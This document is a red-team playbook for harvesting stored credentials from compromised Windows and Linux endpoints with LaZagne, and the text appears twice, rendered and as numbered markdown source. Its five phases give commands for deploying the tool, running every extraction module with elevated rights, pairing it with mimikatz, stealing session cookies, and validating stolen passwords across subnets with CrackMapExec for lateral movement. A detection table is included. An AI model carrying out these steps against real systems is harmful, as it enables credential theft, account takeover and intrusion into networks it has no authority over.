Performing Credential Access with LaZagne
Overview
LaZagne is an open-source post-exploitation tool designed to retrieve credentials stored on local systems. It supports Windows, Linux, and macOS, with the most extensive module library for Windows. LaZagne recovers passwords from browsers (Chrome, Firefox, Edge, Opera), email clients (Outlook, Thunderbird), databases (PostgreSQL, MySQL, SQLite), system stores (Windows Credential Manager, LSA secrets, DPAPI), Wi-Fi profiles, Git credentials, and dozens of other applications. The tool is categorized under MITRE ATT&CK T1555 (Credentials from Password Stores) and is listed as software S0349. Red teams use LaZagne after gaining initial access to harvest stored credentials that enable lateral movement and privilege escalation.
When to Use
- When conducting security assessments that involve performing credential access with lazagne
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
Most Often Missed & How to Confirm
- Run
lazagne.exe all (every module), not just browsers — operators routinely skip windows (Credential Manager/Vault/LSA secrets/autologon), wifi, mails, databases, and sysadmin (PuTTY/WinSCP/FileZilla/OpenSSH), which is where the lateral-movement creds usually live.
- DPAPI master keys, LSA secrets, and autologon need SYSTEM/admin — run once as the user, then re-run elevated (
lazagne.exe all under a SYSTEM token). A standard-user run that returns "nothing" is a false negative for system stores.
- Memory/LSASS-resident secrets aren't covered by LaZagne — pair with mimikatz
sekurlsa::logonpasswords / lsadump::secrets; concluding "no creds" from LaZagne alone misses cached logons.
- Browser cookies/session tokens (T1539) are missed when only password fields are checked — grab them for session hijack even when no plaintext password exists.
- Always export with
-oJ -output <path> so nothing scrolls off; a truncated console is a common reason hits get missed.
- Positive signal: JSON
results arrays are non-empty with populated Login/Password fields, and a recovered cred authenticates — crackmapexec smb <range> -u <user> -p '<pass>' returns Pwn3d! or [+].
- Don't conclude "no credentials present" until: (1)
all ran both as the user and elevated/SYSTEM, (2) every browser profile path was reachable (no locked profiles), (3) wifi/sysadmin/databases modules ran, and (4) at least one recovered cred was validated against AD/SMB.
Prerequisites
- Familiarity with red teaming concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
Objectives
- Deploy LaZagne on compromised Windows, Linux, or macOS endpoints
- Extract credentials from all supported password stores
- Parse and prioritize recovered credentials for lateral movement
- Identify high-value credentials (domain admin, service accounts, cloud access)
- Document credential harvesting results with appropriate evidence handling
- Correlate recovered credentials with BloodHound attack paths
MITRE ATT&CK Mapping
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
- T1555.004 - Credentials from Password Stores: Windows Credential Manager
- T1552.001 - Unsecured Credentials: Credentials In Files
- T1552.002 - Unsecured Credentials: Credentials in Registry
- T1003.004 - OS Credential Dumping: LSA Secrets
- T1539 - Steal Web Session Cookie
Workflow
Phase 1: LaZagne Deployment
- Transfer LaZagne to the compromised host:
# Pre-compiled executable (Windows)
# Transfer lazagne.exe via C2 channel or file upload
# Python version (requires Python on target)
git clone https://github.com/AlessandroZ/LaZagne.git
cd LaZagne
pip install -r requirements.txt
- Verify execution capability and privileges:
# Check current user context
whoami /priv
# LaZagne works with standard user privileges for user-level stores
# SYSTEM/Admin privileges needed for DPAPI master keys, LSA secrets, SAM
Phase 2: Full Credential Extraction (Windows)
- Run LaZagne with all modules:
# Extract all credentials
lazagne.exe all
# Export results to JSON
lazagne.exe all -oJ
# Export results to specific file
lazagne.exe all -oJ -output C:\Temp\creds
- Run specific modules for targeted extraction:
# Browsers only (Chrome, Firefox, Edge, Opera, IE)
lazagne.exe browsers
# Windows credential stores
lazagne.exe windows
# Database credentials
lazagne.exe databases
# Email client credentials
lazagne.exe mails
# Wi-Fi passwords
lazagne.exe wifi
# Git credentials
lazagne.exe git
# System credentials (requires elevated privileges)
lazagne.exe sysadmin
Phase 3: Credential Extraction (Linux)
- Run LaZagne on Linux targets:
# Full extraction
python3 laZagne.py all
# Browser credentials
python3 laZagne.py browsers
# System credentials (SSH keys, shadow file with root)
python3 laZagne.py sysadmin
# Database credentials
python3 laZagne.py databases
# Git credentials
python3 laZagne.py git
Phase 4: Credential Analysis and Prioritization
- Parse JSON output for unique credentials:
import json
with open("creds.json") as f:
results = json.load(f)
for module in results:
for entry in module.get("results", []):
print(f"Source: {entry.get('Category')}")
print(f" User: {entry.get('Login', 'N/A')}")
print(f" URL/Host: {entry.get('URL', entry.get('Host', 'N/A'))}")
- Prioritize credentials by value:
- Domain credentials (AD accounts) for lateral movement
- Cloud service credentials (AWS, Azure, GCP console)
- VPN and remote access credentials
- Database credentials for data access
- Email credentials for business email compromise
- Service account credentials for privilege escalation
Phase 5: Credential Validation and Use
- Validate recovered domain credentials:
# Test domain credentials with CrackMapExec
crackmapexec smb 10.10.10.0/24 -u recovered_user -p 'recovered_pass'
# Test with Impacket
smbclient.py domain.local/user:'password'@10.10.10.1
- Cross-reference with BloodHound paths for high-value targets
- Use recovered credentials for lateral movement or privilege escalation
Tools and Resources
| Tool |
Purpose |
Platform |
| LaZagne |
Multi-source credential extraction |
Windows/Linux/macOS |
| Mimikatz |
LSASS/DPAPI credential dumping |
Windows |
| SharpChrome |
Chrome credential extraction (.NET) |
Windows |
| SharpDPAPI |
DPAPI credential decryption |
Windows |
| CrackMapExec |
Credential validation and spraying |
Linux |
| Impacket |
Remote credential testing |
Linux (Python) |
LaZagne Module Coverage (Windows)
| Category |
Modules |
| Browsers |
Chrome, Firefox, Edge, Opera, IE, Brave, Vivaldi |
| Email |
Outlook, Thunderbird, Foxmail |
| Databases |
PostgreSQL, MySQL, SQLiteDB, Robomongo |
| Sysadmin |
PuTTY, WinSCP, FileZilla, OpenSSH, RDPManager |
| Windows |
Credential Manager, Vault, DPAPI, Autologon |
| WiFi |
Stored Wi-Fi passwords |
| Git |
Git Credential Store, Git Credential Manager |
| SVN |
TortoiseSVN |
| Chat |
Pidgin, Skype |
Detection Signatures
| Indicator |
Detection Method |
| LaZagne.exe process execution |
EDR process monitoring with hash-based detection |
| Access to Chrome Login Data SQLite DB |
File access monitoring on browser credential stores |
| DPAPI CryptUnprotectData API calls |
API hooking and ETW tracing |
| Access to Windows Credential Manager |
Event 5379 (Credential Manager read) |
| Mass credential store enumeration |
Behavioral analysis for sequential access patterns |
| Python interpreter accessing credential files |
Script block logging and file access auditing |
Validation Criteria
1---2name: performing-credential-access-with-lazagne3description: Extract stored credentials from compromised endpoints using the LaZagne post-exploitation tool to recover passwords from browsers, databases, system vaults, and applications during authorized red team operations.4license: Apache-2.05---6# Performing Credential Access with LaZagne
7
8## Overview
9
10LaZagne is an open-source post-exploitation tool designed to retrieve credentials stored on local systems. It supports Windows, Linux, and macOS, with the most extensive module library for Windows. LaZagne recovers passwords from browsers (Chrome, Firefox, Edge, Opera), email clients (Outlook, Thunderbird), databases (PostgreSQL, MySQL, SQLite), system stores (Windows Credential Manager, LSA secrets, DPAPI), Wi-Fi profiles, Git credentials, and dozens of other applications. The tool is categorized under MITRE ATT&CK T1555 (Credentials from Password Stores) and is listed as software S0349. Red teams use LaZagne after gaining initial access to harvest stored credentials that enable lateral movement and privilege escalation.
11
12
13## When to Use
14
15- When conducting security assessments that involve performing credential access with lazagne
16- When following incident response procedures for related security events
17- When performing scheduled security testing or auditing activities
18- When validating security controls through hands-on testing
19
20## Most Often Missed & How to Confirm
21
22- Run `lazagne.exe all` (every module), not just `browsers` — operators routinely skip `windows` (Credential Manager/Vault/LSA secrets/autologon), `wifi`, `mails`, `databases`, and `sysadmin` (PuTTY/WinSCP/FileZilla/OpenSSH), which is where the lateral-movement creds usually live.
23- DPAPI master keys, LSA secrets, and autologon need SYSTEM/admin — run once as the user, then re-run elevated (`lazagne.exe all` under a SYSTEM token). A standard-user run that returns "nothing" is a false negative for system stores.
24- Memory/LSASS-resident secrets aren't covered by LaZagne — pair with mimikatz `sekurlsa::logonpasswords` / `lsadump::secrets`; concluding "no creds" from LaZagne alone misses cached logons.
25- Browser cookies/session tokens (T1539) are missed when only password fields are checked — grab them for session hijack even when no plaintext password exists.
26- Always export with `-oJ -output <path>` so nothing scrolls off; a truncated console is a common reason hits get missed.
27- Positive signal: JSON `results` arrays are non-empty with populated `Login`/`Password` fields, and a recovered cred authenticates — `crackmapexec smb <range> -u <user> -p '<pass>'` returns `Pwn3d!` or `[+]`.
28- Don't conclude "no credentials present" until: (1) `all` ran both as the user and elevated/SYSTEM, (2) every browser profile path was reachable (no locked profiles), (3) wifi/sysadmin/databases modules ran, and (4) at least one recovered cred was validated against AD/SMB.
29
30## Prerequisites
31
32- Familiarity with red teaming concepts and tools
33- Access to a test or lab environment for safe execution
34- Python 3.8+ with required dependencies installed
35- Appropriate authorization for any testing activities
36
37## Objectives
38
39- Deploy LaZagne on compromised Windows, Linux, or macOS endpoints
40- Extract credentials from all supported password stores
41- Parse and prioritize recovered credentials for lateral movement
42- Identify high-value credentials (domain admin, service accounts, cloud access)
43- Document credential harvesting results with appropriate evidence handling
44- Correlate recovered credentials with BloodHound attack paths
45
46## MITRE ATT&CK Mapping
47
48- **T1555** - Credentials from Password Stores
49- **T1555.003** - Credentials from Password Stores: Credentials from Web Browsers
50- **T1555.004** - Credentials from Password Stores: Windows Credential Manager
51- **T1552.001** - Unsecured Credentials: Credentials In Files
52- **T1552.002** - Unsecured Credentials: Credentials in Registry
53- **T1003.004** - OS Credential Dumping: LSA Secrets
54- **T1539** - Steal Web Session Cookie
55
56## Workflow
57
58### Phase 1: LaZagne Deployment
591. Transfer LaZagne to the compromised host:
60 ```powershell
61 # Pre-compiled executable (Windows)
62 # Transfer lazagne.exe via C2 channel or file upload
63
64 # Python version (requires Python on target)
65 git clone https://github.com/AlessandroZ/LaZagne.git
66 cd LaZagne
67 pip install -r requirements.txt
68 ```
692. Verify execution capability and privileges:
70 ```powershell
71 # Check current user context
72 whoami /priv
73
74 # LaZagne works with standard user privileges for user-level stores
75 # SYSTEM/Admin privileges needed for DPAPI master keys, LSA secrets, SAM
76 ```
77
78### Phase 2: Full Credential Extraction (Windows)
791. Run LaZagne with all modules:
80 ```powershell
81 # Extract all credentials
82 lazagne.exe all
83
84 # Export results to JSON
85 lazagne.exe all -oJ
86
87 # Export results to specific file
88 lazagne.exe all -oJ -output C:\Temp\creds
89 ```
902. Run specific modules for targeted extraction:
91 ```powershell
92 # Browsers only (Chrome, Firefox, Edge, Opera, IE)
93 lazagne.exe browsers
94
95 # Windows credential stores
96 lazagne.exe windows
97
98 # Database credentials
99 lazagne.exe databases
100
101 # Email client credentials
102 lazagne.exe mails
103
104 # Wi-Fi passwords
105 lazagne.exe wifi
106
107 # Git credentials
108 lazagne.exe git
109
110 # System credentials (requires elevated privileges)
111 lazagne.exe sysadmin
112 ```
113
114### Phase 3: Credential Extraction (Linux)
1151. Run LaZagne on Linux targets:
116 ```bash
117 # Full extraction
118 python3 laZagne.py all
119
120 # Browser credentials
121 python3 laZagne.py browsers
122
123 # System credentials (SSH keys, shadow file with root)
124 python3 laZagne.py sysadmin
125
126 # Database credentials
127 python3 laZagne.py databases
128
129 # Git credentials
130 python3 laZagne.py git
131 ```
132
133### Phase 4: Credential Analysis and Prioritization
1341. Parse JSON output for unique credentials:
135 ```python
136 import json
137 with open("creds.json") as f:
138 results = json.load(f)
139 for module in results:
140 for entry in module.get("results", []):
141 print(f"Source: {entry.get('Category')}")
142 print(f" User: {entry.get('Login', 'N/A')}")
143 print(f" URL/Host: {entry.get('URL', entry.get('Host', 'N/A'))}")
144 ```
1452. Prioritize credentials by value:
146 - Domain credentials (AD accounts) for lateral movement
147 - Cloud service credentials (AWS, Azure, GCP console)
148 - VPN and remote access credentials
149 - Database credentials for data access
150 - Email credentials for business email compromise
151 - Service account credentials for privilege escalation
152
153### Phase 5: Credential Validation and Use
1541. Validate recovered domain credentials:
155 ```bash
156 # Test domain credentials with CrackMapExec
157 crackmapexec smb 10.10.10.0/24 -u recovered_user -p 'recovered_pass'
158
159 # Test with Impacket
160 smbclient.py domain.local/user:'password'@10.10.10.1
161 ```
1622. Cross-reference with BloodHound paths for high-value targets
1633. Use recovered credentials for lateral movement or privilege escalation
164
165## Tools and Resources
166
167| Tool | Purpose | Platform |
168|------|---------|----------|
169| LaZagne | Multi-source credential extraction | Windows/Linux/macOS |
170| Mimikatz | LSASS/DPAPI credential dumping | Windows |
171| SharpChrome | Chrome credential extraction (.NET) | Windows |
172| SharpDPAPI | DPAPI credential decryption | Windows |
173| CrackMapExec | Credential validation and spraying | Linux |
174| Impacket | Remote credential testing | Linux (Python) |
175
176## LaZagne Module Coverage (Windows)
177
178| Category | Modules |
179|----------|---------|
180| Browsers | Chrome, Firefox, Edge, Opera, IE, Brave, Vivaldi |
181| Email | Outlook, Thunderbird, Foxmail |
182| Databases | PostgreSQL, MySQL, SQLiteDB, Robomongo |
183| Sysadmin | PuTTY, WinSCP, FileZilla, OpenSSH, RDPManager |
184| Windows | Credential Manager, Vault, DPAPI, Autologon |
185| WiFi | Stored Wi-Fi passwords |
186| Git | Git Credential Store, Git Credential Manager |
187| SVN | TortoiseSVN |
188| Chat | Pidgin, Skype |
189
190## Detection Signatures
191
192| Indicator | Detection Method |
193|-----------|-----------------|
194| LaZagne.exe process execution | EDR process monitoring with hash-based detection |
195| Access to Chrome Login Data SQLite DB | File access monitoring on browser credential stores |
196| DPAPI CryptUnprotectData API calls | API hooking and ETW tracing |
197| Access to Windows Credential Manager | Event 5379 (Credential Manager read) |
198| Mass credential store enumeration | Behavioral analysis for sequential access patterns |
199| Python interpreter accessing credential files | Script block logging and file access auditing |
200
201## Validation Criteria
202
203- [ ] LaZagne deployed on compromised endpoint
204- [ ] Full credential extraction completed (all modules)
205- [ ] Credentials exported in JSON format for analysis
206- [ ] Recovered credentials parsed and deduplicated
207- [ ] High-value credentials identified and prioritized
208- [ ] Domain credentials validated against AD
209- [ ] Lateral movement opportunities identified from recovered creds
210- [ ] Evidence documented with appropriate handling procedures